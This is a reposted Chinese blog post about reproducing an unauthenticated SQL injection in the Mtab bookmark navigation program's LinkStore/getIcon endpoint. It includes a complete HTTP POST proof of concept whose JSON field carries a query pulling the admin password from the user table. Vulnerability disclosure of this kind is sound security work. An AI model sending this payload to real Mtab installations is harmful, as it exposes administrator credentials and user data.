博客
关于我
Mtab书签导航程序 LinkStore/getIcon SQL注入漏洞复现
阅读量:796 次
发布时间:2023-02-10

本文共 746 字,大约阅读时间需要 2 分钟。

Mtab书签导航程序安全审计报告

产品简介

Mtab书签导航程序是一款专注于网页和应用书签管理的免费浏览器插件。作为一款无广告的在线书签工具,它支持多端同步、美观易用的导航体验,旨在帮助用户高效管理网页和应用,提升在线浏览效率。

漏洞发现

在安全测试中,我们发现该程序的LinkStore/getIcon接口存在严重的SQL注入漏洞。该漏洞未经身份验证,攻击者可利用这一漏洞获取以下信息:

  • 数据库中的敏感信息,包括管理员后台密码和用户个人信息
  • 高权限权限下,可向服务器中写入木马程序,进一步获取系统权限

复现环境

  • 工具:使用常见的Web安全工具进行请求构造
  • 目标URL/LinkStore/getIcon
  • 请求方法:POST请求
  • 请求头
    Host: [目标域名]User-Agent: [模拟浏览器信息]
  • 内容类型:application/json

漏洞复现

通过对接口的仔细分析,我们成功构造了以下证明用例(PoC):

POST /LinkStore/getIcon HTTP/1.1Host: [目标域名]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Content-Type: application/jsonConnection: Keep-alive{  "param": "SELECT `user`.`password` FROM `user` WHERE `username`= 'admin'"}

总结

该漏洞对系统安全性构成重大威胁,建议及时修复并升级相关接口安全性。

转载地址:http://ioffk.baihongyu.com/

你可能感兴趣的文章
mysql中json_extract的使用方法
查看>>
mysql中json_extract的使用方法
查看>>
mysql中kill掉所有锁表的进程
查看>>
mysql中like % %模糊查询
查看>>
MySql中mvcc学习记录
查看>>
mysql中null和空字符串的区别与问题!
查看>>